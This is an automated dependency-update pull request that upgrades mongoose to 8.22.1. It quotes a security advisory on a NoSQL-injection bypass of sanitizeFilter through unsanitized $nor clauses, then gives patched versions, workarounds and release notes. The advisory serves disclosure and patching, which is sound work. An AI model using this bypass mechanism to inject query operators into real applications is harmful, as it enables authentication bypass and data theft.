fix(deps): update dependency mongoose to v8.22.1 [security]

[renovate]

This PR contains the following updates:

Package	Change	Age	Confidence
mongoose (source)	8.19.0 → 8.22.1

---

Mongoose's Improper Sanitization of $nor in sanitizeFilter May Allow NoSQL Injection

CVE-2026-42334 / GHSA-wpg9-53fq-2r8h

More information

Details

Impact

This vulnerability allows bypassing Mongoose’s sanitizeFilter query sanitization mechanism via the $nor operator.

When sanitizeFilter is enabled, Mongoose wraps query operators in $eq to neutralize them. However, prior to the fix, $nor was not included in the set of logical operators that are recursively sanitized. Because $nor accepts an array (like $and and $or), and arrays do not trigger hasDollarKeys(), malicious operators such as $ne, $gt, or $regex could be injected inside a $nor clause without being sanitized.

This may lead to:

• Authentication bypass
• Unauthorized data access
• Data exfiltration

Affected users:

Applications that:

• Explicitly enable sanitizeFilter
• Pass unsanitized user-controlled input directly into query methods (e.g., Model.findOne(req.body)) and rely on sanitizeFilter to strip out query selectors

Applications that validate input schemas, whitelist fields, or avoid passing raw request bodies into queries are not affected. For example, Model.findOne({ user: req.body.user, pwd: req.body.pwd }) is not affected.

Patches

Patches have been released for all supported Mongoose release lines:

• ^6.13.9
• ^7.8.9
• ^8.22.1
• ^9.1.6

Workarounds

Delete $nor keys, use an additional schema validation library, or write middleware to strip out $nor from query filters.

Resources

sanitizeFilter documentation: https://mongoosejs.com/docs/api/mongoose.html#Mongoose.prototype.sanitizeFilter()

Original blog post on sanitizeFilter: https://thecodebarbarian.com/whats-new-in-mongoose-6-sanitizefilter.html

Severity

• CVSS Score: 7.5 / 10 (High)
• Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

References

• https://github.com/Automattic/mongoose/security/advisories/GHSA-wpg9-53fq-2r8h
• https://mongoosejs.com/docs/api/mongoose.html#Mongoose.prototype.sanitizeFilter()
• https://thecodebarbarian.com/whats-new-in-mongoose-6-sanitizefilter.html
• https://nvd.nist.gov/vuln/detail/CVE-2026-42334
• https://github.com/advisories/GHSA-wpg9-53fq-2r8h

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

Release Notes

Automattic/mongoose (mongoose)

v8.22.1

Compare Source

==================

• fix: handle other top-level query operators in sanitizeFilter
• fix(document): when cloning a doc with subdocs, make sure the subdocs parent is the cloned doc #​15904 #​15901
• types(models): support Mongoose query casting in AnyBulkWriteOperation filter property #​15910
• types: add toBSON() to documents #​15927

v8.22.0

Compare Source

8.22.0 / 2026-01-27

• feat(model): allow passing strict option to hydrate() #​15944 #​15940

v8.21.1

Compare Source

===================

• fix(clone): fix parent doc for map subdocuments and array subdocuments #​15958 AbdelrahmanHafez
• fix(document): when cloning a doc with subdocs, make sure the subdocs parent is the cloned doc #​15904 #​15901
• fix: respect currentTime schema option in bulkWrite updates #​15976 sderrow
• types(models): support Mongoose query casting in AnyBulkWriteOperation filter property #​15910
• types: add toBSON() to documents #​15927

v8.21.0

Compare Source

===================

• feat(document+model): pass options to pre('deleteOne') and update+options to pre('updateOne') hooks #​15908 #​15870
• feat(document): add support for getAtomics() to allow custom container types to utilize atomics #​15817
• fix: add support for typescript style enums #​15914 #​15913 mjfwebb

v8.20.4

Compare Source

===================

• fix(model): ensure $isDeleted is set after calling doc.deleteOne() successfully #​15898
• fix(document): use bitwise OR to accumulate version mode flags #​15893 #​15888 AbdelrahmanHafez

v8.20.3

Compare Source

===================

• perf: use Object.hasOwn instead of Object#hasOwnProperty #​15875 AbdelrahmanHafez
• fix: improve error when calling Document.prototype.init() with null/undefined #​15812 Vegapunk-debug
• types(schema): avoid treating paths with default: null as required #​15889
• types(schema): allow partial statics to schema.statics() #​15780

v8.20.2

Compare Source

===================

• fix(model): bump version if necessary after successful bulkSave() #​15809 #​15800
• fix(bulkWrite): pass overwriteImmutable option to castUpdate fixes #​15789 #​15782 #​15781
• types(schema): allow calling schema.static() with as TStatics #​15794 #​15780

v8.20.1

Compare Source

===================

• types: correct Model.schema type and fix unknown check for this param type in schema.methods #​15750 #​15693
• docs: add detailed loadClass() TypeScript usage guide #​15731 #​12813 Necro-Rohan
• docs: update version support documentation for Mongoose #​15761 ManmathX
• docs: add copy-to-clipboard feature for code blocks in docs #​15759 vedansha07

v8.20.0

Compare Source

===================

• feat: cast id parameter based on schema _id type in DocumentArray.id() #​15733 #​15725 #​15724 Lex-Ashu
• fix: pass parent schema to SchemaType constructors in interpretAsType to make implementing custom container types easier #​15700
• types(models): default _id type to ObjectId for Document #​15688 Catwallon
• docs: add FAQ entry about DivergentArrayError #​15743 Mario5T
• docs: update browser.md with Mongoose limitations #​15744 YashSharma64
• chore: add benchmark for large nested array documents (related to #​9588) #​15742 Kundan-CR7

v8.19.4

Compare Source

===================

• fix(schema): avoid throwing error on array of unions #​15720 #​15718
• fix: store original index on insertMany validation errors #​15735 Jadu07
• types: correct return type of discriminator to Model #​15726 twentytwo777
• docs: improve Next.js integration guide with comprehensive examples #​15730 adarsh-priydarshi-5646
• docs: add documentation for Union Schema Type #​15721 TechGenie-awake
• docs: removed the outdated callback and replaced them with async/await pattern #​15723 hk2166
• docs: fix lingering remove() call in statics docs #​15737 Gautam-Bharadwaj
• docs: fix inline doc typo in schematypes.d.ts #​15738 hagid786

v8.19.3

Compare Source

===================

• fix(model+plugins): correctly apply shard key on deleteOne() #​15705 #​15701
• fix(schema): correctly cache text indexes as 'text' not 1 #​15695
• types: make inferRawDocType correctly infer empty array type [] as any[] #​15704 #​15699

v8.19.2

Compare Source

===================

• perf(setDefaultsOnInsert): avoid computing all modified paths when running setDefaultsOnInsert and update validators, only calculate if there are defaults to set #​15691 #​15672
• fix: correct handling of relative vs absolute paths with maps and subdocuments #​15682 #​15678 #​15350
• ci: add publish script with provenance #​15684 #​15680

v8.19.1

Compare Source

===================

• perf: avoid getting all modified paths in update when checking if versionKey needs to be set #​15677 #​15672
• perf: Avoid needless path translation #​15679 orgads
• fix(query): throw error if using update operator with modifier and no path #​15670 #​15642
• types: avoid making FilterQuery a conditional type because of how typescript handles distributed conditional unions #​15676 #​15671
• docs: update installation instructions #​15675 aalok-y

---

Configuration

📅 Schedule: (UTC)

• Branch creation
  • ""
• Automerge
  • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.

[sonarqubecloud]

Quality Gate passed

Issues
0 New issues
0 Accepted issues

Measures
0 Security Hotspots
0.0% Coverage on New Code
0.0% Duplication on New Code

See analysis details on SonarQube Cloud